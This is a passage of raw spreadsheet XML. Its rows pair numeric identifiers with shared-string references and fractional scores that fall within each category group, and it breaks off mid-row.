        <v>15707</v>
      </c>
      <c r="D16276" s="2">
        <v>1.0</v>
      </c>
      <c r="E16276" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16276" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16277" ht="15.75" customHeight="1">
      <c r="A16277" s="1">
        <v>8520.0</v>
      </c>
      <c r="B16277" s="2">
        <v>5.4086034E7</v>
      </c>
      <c r="C16277" s="2" t="s">
        <v>15708</v>
      </c>
      <c r="D16277" s="2">
        <v>1.0</v>
      </c>
      <c r="E16277" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16277" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16278" ht="15.75" customHeight="1">
      <c r="A16278" s="1">
        <v>8806.0</v>
      </c>
      <c r="B16278" s="2">
        <v>5.4612686E7</v>
      </c>
      <c r="C16278" s="2" t="s">
        <v>15709</v>
      </c>
      <c r="D16278" s="2">
        <v>1.0</v>
      </c>
      <c r="E16278" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16278" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16279" ht="15.75" customHeight="1">
      <c r="A16279" s="1">
        <v>9832.0</v>
      </c>
      <c r="B16279" s="2">
        <v>5.6639103E7</v>
      </c>
      <c r="C16279" s="2" t="s">
        <v>15710</v>
      </c>
      <c r="D16279" s="2">
        <v>1.0</v>
      </c>
      <c r="E16279" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16279" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16280" ht="15.75" customHeight="1">
      <c r="A16280" s="1">
        <v>11086.0</v>
      </c>
      <c r="B16280" s="2">
        <v>1.8486557E7</v>
      </c>
      <c r="C16280" s="2" t="s">
        <v>15711</v>
      </c>
      <c r="D16280" s="2">
        <v>1.0</v>
      </c>
      <c r="E16280" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16280" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16281" ht="15.75" customHeight="1">
      <c r="A16281" s="1">
        <v>12027.0</v>
      </c>
      <c r="B16281" s="2">
        <v>2.6139089E7</v>
      </c>
      <c r="C16281" s="2" t="s">
        <v>15712</v>
      </c>
      <c r="D16281" s="2">
        <v>1.0</v>
      </c>
      <c r="E16281" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16281" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16282" ht="15.75" customHeight="1">
      <c r="A16282" s="1">
        <v>12206.0</v>
      </c>
      <c r="B16282" s="2">
        <v>2.7569482E7</v>
      </c>
      <c r="C16282" s="2" t="s">
        <v>15713</v>
      </c>
      <c r="D16282" s="2">
        <v>1.0</v>
      </c>
      <c r="E16282" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16282" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16283" ht="15.75" customHeight="1">
      <c r="A16283" s="1">
        <v>13957.0</v>
      </c>
      <c r="B16283" s="2">
        <v>3.7298203E7</v>
      </c>
      <c r="C16283" s="2" t="s">
        <v>15714</v>
      </c>
      <c r="D16283" s="2">
        <v>1.0</v>
      </c>
      <c r="E16283" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16283" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16284" ht="15.75" customHeight="1">
      <c r="A16284" s="1">
        <v>14451.0</v>
      </c>
      <c r="B16284" s="2">
        <v>3.9376303E7</v>
      </c>
      <c r="C16284" s="2" t="s">
        <v>15715</v>
      </c>
      <c r="D16284" s="2">
        <v>1.0</v>
      </c>
      <c r="E16284" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16284" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16285" ht="15.75" customHeight="1">
      <c r="A16285" s="1">
        <v>14464.0</v>
      </c>
      <c r="B16285" s="2">
        <v>3.9483201E7</v>
      </c>
      <c r="C16285" s="2" t="s">
        <v>15716</v>
      </c>
      <c r="D16285" s="2">
        <v>1.0</v>
      </c>
      <c r="E16285" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16285" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16286" ht="15.75" customHeight="1">
      <c r="A16286" s="1">
        <v>14810.0</v>
      </c>
      <c r="B16286" s="2">
        <v>4.0929326E7</v>
      </c>
      <c r="C16286" s="2" t="s">
        <v>15717</v>
      </c>
      <c r="D16286" s="2">
        <v>1.0</v>
      </c>
      <c r="E16286" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16286" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16287" ht="15.75" customHeight="1">
      <c r="A16287" s="1">
        <v>15524.0</v>
      </c>
      <c r="B16287" s="2">
        <v>4.329291E7</v>
      </c>
      <c r="C16287" s="2" t="s">
        <v>15718</v>
      </c>
      <c r="D16287" s="2">
        <v>1.0</v>
      </c>
      <c r="E16287" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16287" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16288" ht="15.75" customHeight="1">
      <c r="A16288" s="1">
        <v>17020.0</v>
      </c>
      <c r="B16288" s="2">
        <v>4.8456373E7</v>
      </c>
      <c r="C16288" s="2" t="s">
        <v>15719</v>
      </c>
      <c r="D16288" s="2">
        <v>1.0</v>
      </c>
      <c r="E16288" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16288" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16289" ht="15.75" customHeight="1">
      <c r="A16289" s="1">
        <v>17217.0</v>
      </c>
      <c r="B16289" s="2">
        <v>4.9055725E7</v>
      </c>
      <c r="C16289" s="2" t="s">
        <v>15720</v>
      </c>
      <c r="D16289" s="2">
        <v>1.0</v>
      </c>
      <c r="E16289" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16289" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16290" ht="15.75" customHeight="1">
      <c r="A16290" s="1">
        <v>17713.0</v>
      </c>
      <c r="B16290" s="2">
        <v>5.0595642E7</v>
      </c>
      <c r="C16290" s="2" t="s">
        <v>15721</v>
      </c>
      <c r="D16290" s="2">
        <v>1.0</v>
      </c>
      <c r="E16290" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16290" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16291" ht="15.75" customHeight="1">
      <c r="A16291" s="1">
        <v>17866.0</v>
      </c>
      <c r="B16291" s="2">
        <v>5.1017115E7</v>
      </c>
      <c r="C16291" s="2" t="s">
        <v>15722</v>
      </c>
      <c r="D16291" s="2">
        <v>1.0</v>
      </c>
      <c r="E16291" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16291" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16292" ht="15.75" customHeight="1">
      <c r="A16292" s="1">
        <v>21750.0</v>
      </c>
      <c r="B16292" s="2">
        <v>2.6042847E7</v>
      </c>
      <c r="C16292" s="2" t="s">
        <v>15723</v>
      </c>
      <c r="D16292" s="2">
        <v>1.0</v>
      </c>
      <c r="E16292" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16292" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16293" ht="15.75" customHeight="1">
      <c r="A16293" s="1">
        <v>22029.0</v>
      </c>
      <c r="B16293" s="2">
        <v>3.0144843E7</v>
      </c>
      <c r="C16293" s="2" t="s">
        <v>7169</v>
      </c>
      <c r="D16293" s="2">
        <v>1.0</v>
      </c>
      <c r="E16293" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16293" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16294" ht="15.75" customHeight="1">
      <c r="A16294" s="1">
        <v>24038.0</v>
      </c>
      <c r="B16294" s="2">
        <v>9484884.0</v>
      </c>
      <c r="C16294" s="2" t="s">
        <v>15724</v>
      </c>
      <c r="D16294" s="2">
        <v>1.0</v>
      </c>
      <c r="E16294" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16294" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16295" ht="15.75" customHeight="1">
      <c r="A16295" s="1">
        <v>24176.0</v>
      </c>
      <c r="B16295" s="2">
        <v>1.0204735E7</v>
      </c>
      <c r="C16295" s="2" t="s">
        <v>15725</v>
      </c>
      <c r="D16295" s="2">
        <v>1.0</v>
      </c>
      <c r="E16295" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16295" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16296" ht="15.75" customHeight="1">
      <c r="A16296" s="1">
        <v>27321.0</v>
      </c>
      <c r="B16296" s="2">
        <v>2.1378203E7</v>
      </c>
      <c r="C16296" s="2" t="s">
        <v>15726</v>
      </c>
      <c r="D16296" s="2">
        <v>1.0</v>
      </c>
      <c r="E16296" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16296" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16297" ht="15.75" customHeight="1">
      <c r="A16297" s="1">
        <v>29036.0</v>
      </c>
      <c r="B16297" s="2">
        <v>3.0144842E7</v>
      </c>
      <c r="C16297" s="2" t="s">
        <v>15727</v>
      </c>
      <c r="D16297" s="2">
        <v>1.0</v>
      </c>
      <c r="E16297" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16297" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16298" ht="15.75" customHeight="1">
      <c r="A16298" s="1">
        <v>29787.0</v>
      </c>
      <c r="B16298" s="2">
        <v>3.5022539E7</v>
      </c>
      <c r="C16298" s="2" t="s">
        <v>15728</v>
      </c>
      <c r="D16298" s="2">
        <v>1.0</v>
      </c>
      <c r="E16298" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16298" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16299" ht="15.75" customHeight="1">
      <c r="A16299" s="1">
        <v>31770.0</v>
      </c>
      <c r="B16299" s="2">
        <v>5219083.0</v>
      </c>
      <c r="C16299" s="2" t="s">
        <v>15729</v>
      </c>
      <c r="D16299" s="2">
        <v>1.0</v>
      </c>
      <c r="E16299" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16299" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16300" ht="15.75" customHeight="1">
      <c r="A16300" s="1">
        <v>33649.0</v>
      </c>
      <c r="B16300" s="2">
        <v>8398850.0</v>
      </c>
      <c r="C16300" s="2" t="s">
        <v>15730</v>
      </c>
      <c r="D16300" s="2">
        <v>1.0</v>
      </c>
      <c r="E16300" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16300" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16301" ht="15.75" customHeight="1">
      <c r="A16301" s="1">
        <v>34003.0</v>
      </c>
      <c r="B16301" s="2">
        <v>9484883.0</v>
      </c>
      <c r="C16301" s="2" t="s">
        <v>15731</v>
      </c>
      <c r="D16301" s="2">
        <v>1.0</v>
      </c>
      <c r="E16301" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16301" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16302" ht="15.75" customHeight="1">
      <c r="A16302" s="1">
        <v>12280.0</v>
      </c>
      <c r="B16302" s="2">
        <v>2.8159351E7</v>
      </c>
      <c r="C16302" s="2" t="s">
        <v>15732</v>
      </c>
      <c r="D16302" s="2">
        <v>1.0</v>
      </c>
      <c r="E16302" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16302" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="16303" ht="15.75" customHeight="1">
      <c r="A16303" s="1">
        <v>16956.0</v>
      </c>
      <c r="B16303" s="2">
        <v>4.8246091E7</v>
      </c>
      <c r="C16303" s="2" t="s">
        <v>15733</v>
      </c>
      <c r="D16303" s="2">
        <v>1.0</v>
      </c>
      <c r="E16303" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16303" s="2">
        <v>0.09329140461215935</v>
      </c>
    </row>
    <row r="16304" ht="15.75" customHeight="1">
      <c r="A16304" s="1">
        <v>15360.0</v>
      </c>
      <c r="B16304" s="2">
        <v>4.2695701E7</v>
      </c>
      <c r="C16304" s="2" t="s">
        <v>15734</v>
      </c>
      <c r="D16304" s="2">
        <v>1.0</v>
      </c>
      <c r="E16304" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16304" s="2">
        <v>0.09294871794871794</v>
      </c>
    </row>
    <row r="16305" ht="15.75" customHeight="1">
      <c r="A16305" s="1">
        <v>30498.0</v>
      </c>
      <c r="B16305" s="2">
        <v>3.9971722E7</v>
      </c>
      <c r="C16305" s="2" t="s">
        <v>15735</v>
      </c>
      <c r="D16305" s="2">
        <v>1.0</v>
      </c>
      <c r="E16305" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16305" s="2">
        <v>0.09294871794871794</v>
      </c>
    </row>
    <row r="16306" ht="15.75" customHeight="1">
      <c r="A16306" s="1">
        <v>24646.0</v>
      </c>
      <c r="B16306" s="2">
        <v>1.1484223E7</v>
      </c>
      <c r="C16306" s="2" t="s">
        <v>15736</v>
      </c>
      <c r="D16306" s="2">
        <v>1.0</v>
      </c>
      <c r="E16306" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16306" s="2">
        <v>0.0925925925925926</v>
      </c>
    </row>
    <row r="16307" ht="15.75" customHeight="1">
      <c r="A16307" s="1">
        <v>33582.0</v>
      </c>
      <c r="B16307" s="2">
        <v>8301987.0</v>
      </c>
      <c r="C16307" s="2" t="s">
        <v>15737</v>
      </c>
      <c r="D16307" s="2">
        <v>1.0</v>
      </c>
      <c r="E16307" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16307" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="16308" ht="15.75" customHeight="1">
      <c r="A16308" s="1">
        <v>1610.0</v>
      </c>
      <c r="B16308" s="2">
        <v>2.7819515E7</v>
      </c>
      <c r="C16308" s="2" t="s">
        <v>15738</v>
      </c>
      <c r="D16308" s="2">
        <v>1.0</v>
      </c>
      <c r="E16308" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16308" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="16309" ht="15.75" customHeight="1">
      <c r="A16309" s="1">
        <v>3260.0</v>
      </c>
      <c r="B16309" s="2">
        <v>3.7427937E7</v>
      </c>
      <c r="C16309" s="2" t="s">
        <v>15739</v>
      </c>
      <c r="D16309" s="2">
        <v>1.0</v>
      </c>
      <c r="E16309" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16309" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="16310" ht="15.75" customHeight="1">
      <c r="A16310" s="1">
        <v>17326.0</v>
      </c>
      <c r="B16310" s="2">
        <v>4.9354518E7</v>
      </c>
      <c r="C16310" s="2" t="s">
        <v>15740</v>
      </c>
      <c r="D16310" s="2">
        <v>1.0</v>
      </c>
      <c r="E16310" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16310" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="16311" ht="15.75" customHeight="1">
      <c r="A16311" s="1">
        <v>21464.0</v>
      </c>
      <c r="B16311" s="2">
        <v>2.2763988E7</v>
      </c>
      <c r="C16311" s="2" t="s">
        <v>15593</v>
      </c>
      <c r="D16311" s="2">
        <v>1.0</v>
      </c>
      <c r="E16311" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16311" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="16312" ht="15.75" customHeight="1">
      <c r="A16312" s="1">
        <v>24587.0</v>
      </c>
      <c r="B16312" s="2">
        <v>1.1329898E7</v>
      </c>
      <c r="C16312" s="2" t="s">
        <v>15741</v>
      </c>
      <c r="D16312" s="2">
        <v>1.0</v>
      </c>
      <c r="E16312" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16312" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="16313" ht="15.75" customHeight="1">
      <c r="A16313" s="1">
        <v>24987.0</v>
      </c>
      <c r="B16313" s="2">
        <v>1.2685998E7</v>
      </c>
      <c r="C16313" s="2" t="s">
        <v>15742</v>
      </c>
      <c r="D16313" s="2">
        <v>1.0</v>
      </c>
      <c r="E16313" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16313" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="16314" ht="15.75" customHeight="1">
      <c r="A16314" s="1">
        <v>29209.0</v>
      </c>
      <c r="B16314" s="2">
        <v>3.0778497E7</v>
      </c>
      <c r="C16314" s="2" t="s">
        <v>15743</v>
      </c>
      <c r="D16314" s="2">
        <v>1.0</v>
      </c>
      <c r="E16314" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16314" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="16315" ht="15.75" customHeight="1">
      <c r="A16315" s="1">
        <v>9519.0</v>
      </c>
      <c r="B16315" s="2">
        <v>5.5976425E7</v>
      </c>
      <c r="C16315" s="2" t="s">
        <v>15744</v>
      </c>
      <c r="D16315" s="2">
        <v>1.0</v>
      </c>
      <c r="E16315" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16315" s="2">
        <v>0.09259259259259255</v>
      </c>
    </row>
    <row r="16316" ht="15.75" customHeight="1">
      <c r="A16316" s="1">
        <v>17122.0</v>
      </c>
      <c r="B16316" s="2">
        <v>4.8802057E7</v>
      </c>
      <c r="C16316" s="2" t="s">
        <v>15745</v>
      </c>
      <c r="D16316" s="2">
        <v>1.0</v>
      </c>
      <c r="E16316" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16316" s="2">
        <v>0.09259259259259255</v>
      </c>
    </row>
    <row r="16317" ht="15.75" customHeight="1">
      <c r="A16317" s="1">
        <v>18735.0</v>
      </c>
      <c r="B16317" s="2">
        <v>5.37135E7</v>
      </c>
      <c r="C16317" s="2" t="s">
        <v>15746</v>
      </c>
      <c r="D16317" s="2">
        <v>1.0</v>
      </c>
      <c r="E16317" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16317" s="2">
        <v>0.09259259259259255</v>
      </c>
    </row>
    <row r="16318" ht="15.75" customHeight="1">
      <c r="A16318" s="1">
        <v>19045.0</v>
      </c>
      <c r="B16318" s="2">
        <v>5.456949E7</v>
      </c>
      <c r="C16318" s="2" t="s">
        <v>15747</v>
      </c>
      <c r="D16318" s="2">
        <v>1.0</v>
      </c>
      <c r="E16318" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16318" s="2">
        <v>0.09259259259259255</v>
      </c>
    </row>
    <row r="16319" ht="15.75" customHeight="1">
      <c r="A16319" s="1">
        <v>5495.0</v>
      </c>
      <c r="B16319" s="2">
        <v>4.5795385E7</v>
      </c>
      <c r="C16319" s="2" t="s">
        <v>15748</v>
      </c>
      <c r="D16319" s="2">
        <v>1.0</v>
      </c>
      <c r="E16319" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16319" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="16320" ht="15.75" customHeight="1">
      <c r="A16320" s="1">
        <v>3277.0</v>
      </c>
      <c r="B16320" s="2">
        <v>3.7486296E7</v>
      </c>
      <c r="C16320" s="2" t="s">
        <v>15749</v>
      </c>
      <c r="D16320" s="2">
        <v>1.0</v>
      </c>
      <c r="E16320" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16320" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="16321" ht="15.75" customHeight="1">
      <c r="A16321" s="1">
        <v>5885.0</v>
      </c>
      <c r="B16321" s="2">
        <v>4.7076122E7</v>
      </c>
      <c r="C16321" s="2" t="s">
        <v>15750</v>
      </c>
      <c r="D16321" s="2">
        <v>1.0</v>
      </c>
      <c r="E16321" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16321" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="16322" ht="15.75" customHeight="1">
      <c r="A16322" s="1">
        <v>13006.0</v>
      </c>
      <c r="B16322" s="2">
        <v>3.2813116E7</v>
      </c>
      <c r="C16322" s="2" t="s">
        <v>13335</v>
      </c>
      <c r="D16322" s="2">
        <v>1.0</v>
      </c>
      <c r="E16322" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16322" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="16323" ht="15.75" customHeight="1">
      <c r="A16323" s="1">
        <v>15519.0</v>
      </c>
      <c r="B16323" s="2">
        <v>4.3285388E7</v>
      </c>
      <c r="C16323" s="2" t="s">
        <v>15751</v>
      </c>
      <c r="D16323" s="2">
        <v>1.0</v>
      </c>
      <c r="E16323" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16323" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="16324" ht="15.75" customHeight="1">
      <c r="A16324" s="1">
        <v>28246.0</v>
      </c>
      <c r="B16324" s="2">
        <v>2.5226602E7</v>
      </c>
      <c r="C16324" s="2" t="s">
        <v>15752</v>
      </c>
      <c r="D16324" s="2">
        <v>1.0</v>
      </c>
      <c r="E16324" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16324" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="16325" ht="15.75" customHeight="1">
      <c r="A16325" s="1">
        <v>31273.0</v>
      </c>
      <c r="B16325" s="2">
        <v>4947920.0</v>
      </c>
      <c r="C16325" s="2" t="s">
        <v>15753</v>
      </c>
      <c r="D16325" s="2">
        <v>1.0</v>
      </c>
      <c r="E16325" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16325" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="16326" ht="15.75" customHeight="1">
      <c r="A16326" s="1">
        <v>8743.0</v>
      </c>
      <c r="B16326" s="2">
        <v>5.4539079E7</v>
      </c>
      <c r="C16326" s="2" t="s">
        <v>15754</v>
      </c>
      <c r="D16326" s="2">
        <v>1.0</v>
      </c>
      <c r="E16326" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16326" s="2">
        <v>0.6468834688346884</v>
      </c>
    </row>
    <row r="16327" ht="15.75" customHeight="1">
      <c r="A16327" s="1">
        <v>18835.0</v>
      </c>
      <c r="B16327" s="2">
        <v>5.3940684E7</v>
      </c>
      <c r="C16327" s="2" t="s">
        <v>15756</v>
      </c>
      <c r="D16327" s="2">
        <v>1.0</v>
      </c>
      <c r="E16327" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16327" s="2">
        <v>0.5829579579579578</v>
      </c>
    </row>
    <row r="16328" ht="15.75" customHeight="1">
      <c r="A16328" s="1">
        <v>11989.0</v>
      </c>
      <c r="B16328" s="2">
        <v>2.5853405E7</v>
      </c>
      <c r="C16328" s="2" t="s">
        <v>15757</v>
      </c>
      <c r="D16328" s="2">
        <v>1.0</v>
      </c>
      <c r="E16328" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16328" s="2">
        <v>0.3465909090909091</v>
      </c>
    </row>
    <row r="16329" ht="15.75" customHeight="1">
      <c r="A16329" s="1">
        <v>10705.0</v>
      </c>
      <c r="B16329" s="2">
        <v>1.4910365E7</v>
      </c>
      <c r="C16329" s="2" t="s">
        <v>15758</v>
      </c>
      <c r="D16329" s="2">
        <v>1.0</v>
      </c>
      <c r="E16329" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16329" s="2">
        <v>0.3370870870870872</v>
      </c>
    </row>
    <row r="16330" ht="15.75" customHeight="1">
      <c r="A16330" s="1">
        <v>922.0</v>
      </c>
      <c r="B16330" s="2">
        <v>2.230114E7</v>
      </c>
      <c r="C16330" s="2" t="s">
        <v>15759</v>
      </c>
      <c r="D16330" s="2">
        <v>1.0</v>
      </c>
      <c r="E16330" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16330" s="2">
        <v>0.329059829059829</v>
      </c>
    </row>
    <row r="16331" ht="15.75" customHeight="1">
      <c r="A16331" s="1">
        <v>12120.0</v>
      </c>
      <c r="B16331" s="2">
        <v>2.6900329E7</v>
      </c>
      <c r="C16331" s="2" t="s">
        <v>15760</v>
      </c>
      <c r="D16331" s="2">
        <v>1.0</v>
      </c>
      <c r="E16331" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16331" s="2">
        <v>0.3268398268398268</v>
      </c>
    </row>
    <row r="16332" ht="15.75" customHeight="1">
      <c r="A16332" s="1">
        <v>32526.0</v>
      </c>
      <c r="B16332" s="2">
        <v>5731183.0</v>
      </c>
      <c r="C16332" s="2" t="s">
        <v>15761</v>
      </c>
      <c r="D16332" s="2">
        <v>1.0</v>
      </c>
      <c r="E16332" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16332" s="2">
        <v>0.3019005847953217</v>
      </c>
    </row>
    <row r="16333" ht="15.75" customHeight="1">
      <c r="A16333" s="1">
        <v>10916.0</v>
      </c>
      <c r="B16333" s="2">
        <v>1.6719293E7</v>
      </c>
      <c r="C16333" s="2" t="s">
        <v>15762</v>
      </c>
      <c r="D16333" s="2">
        <v>1.0</v>
      </c>
      <c r="E16333" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16333" s="2">
        <v>0.2965367965367965</v>
      </c>
    </row>
    <row r="16334" ht="15.75" customHeight="1">
      <c r="A16334" s="1">
        <v>20130.0</v>
      </c>
      <c r="B16334" s="2">
        <v>1.0065838E7</v>
      </c>
      <c r="C16334" s="2" t="s">
        <v>15763</v>
      </c>
      <c r="D16334" s="2">
        <v>1.0</v>
      </c>
      <c r="E16334" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16334" s="2">
        <v>0.2904040404040403</v>
      </c>
    </row>
    <row r="16335" ht="15.75" customHeight="1">
      <c r="A16335" s="1">
        <v>26231.0</v>
      </c>
      <c r="B16335" s="2">
        <v>1.6280297E7</v>
      </c>
      <c r="C16335" s="2" t="s">
        <v>15764</v>
      </c>
      <c r="D16335" s="2">
        <v>1.0</v>
      </c>
      <c r="E16335" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16335" s="2">
        <v>0.2904040404040403</v>
      </c>
    </row>
    <row r="16336" ht="15.75" customHeight="1">
      <c r="A16336" s="1">
        <v>15377.0</v>
      </c>
      <c r="B16336" s="2">
        <v>4.2761503E7</v>
      </c>
      <c r="C16336" s="2" t="s">
        <v>15765</v>
      </c>
      <c r="D16336" s="2">
        <v>1.0</v>
      </c>
      <c r="E16336" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16336" s="2">
        <v>0.2890390390390391</v>
      </c>
    </row>
    <row r="16337" ht="15.75" customHeight="1">
      <c r="A16337" s="1">
        <v>25779.0</v>
      </c>
      <c r="B16337" s="2">
        <v>1.4652074E7</v>
      </c>
      <c r="C16337" s="2" t="s">
        <v>15766</v>
      </c>
      <c r="D16337" s="2">
        <v>1.0</v>
      </c>
      <c r="E16337" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16337" s="2">
        <v>0.2879948914431673</v>
      </c>
    </row>
    <row r="16338" ht="15.75" customHeight="1">
      <c r="A16338" s="1">
        <v>31668.0</v>
      </c>
      <c r="B16338" s="2">
        <v>5.1782237E7</v>
      </c>
      <c r="C16338" s="2" t="s">
        <v>15767</v>
      </c>
      <c r="D16338" s="2">
        <v>1.0</v>
      </c>
      <c r="E16338" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16338" s="2">
        <v>0.2821180555555556</v>
      </c>
    </row>
    <row r="16339" ht="15.75" customHeight="1">
      <c r="A16339" s="1">
        <v>10981.0</v>
      </c>
      <c r="B16339" s="2">
        <v>1.7364732E7</v>
      </c>
      <c r="C16339" s="2" t="s">
        <v>15768</v>
      </c>
      <c r="D16339" s="2">
        <v>1.0</v>
      </c>
      <c r="E16339" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16339" s="2">
        <v>0.281986531986532</v>
      </c>
    </row>
    <row r="16340" ht="15.75" customHeight="1">
      <c r="A16340" s="1">
        <v>5663.0</v>
      </c>
      <c r="B16340" s="2">
        <v>4.6315757E7</v>
      </c>
      <c r="C16340" s="2" t="s">
        <v>15769</v>
      </c>
      <c r="D16340" s="2">
        <v>1.0</v>
      </c>
      <c r="E16340" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16340" s="2">
        <v>0.2767767767767766</v>
      </c>
    </row>
    <row r="16341" ht="15.75" customHeight="1">
      <c r="A16341" s="1">
        <v>11184.0</v>
      </c>
      <c r="B16341" s="2">
        <v>1.9756782E7</v>
      </c>
      <c r="C16341" s="2" t="s">
        <v>15770</v>
      </c>
      <c r="D16341" s="2">
        <v>1.0</v>
      </c>
      <c r="E16341" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16341" s="2">
        <v>0.2691197691197691</v>
      </c>
    </row>
    <row r="16342" ht="15.75" customHeight="1">
      <c r="A16342" s="1">
        <v>21377.0</v>
      </c>
      <c r="B16342" s="2">
        <v>2.1658133E7</v>
      </c>
      <c r="C16342" s="2" t="s">
        <v>15771</v>
      </c>
      <c r="D16342" s="2">
        <v>1.0</v>
      </c>
      <c r="E16342" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16342" s="2">
        <v>0.2682291666666667</v>
      </c>
    </row>
    <row r="16343" ht="15.75" customHeight="1">
      <c r="A16343" s="1">
        <v>14666.0</v>
      </c>
      <c r="B16343" s="2">
        <v>4.0451154E7</v>
      </c>
      <c r="C16343" s="2" t="s">
        <v>15772</v>
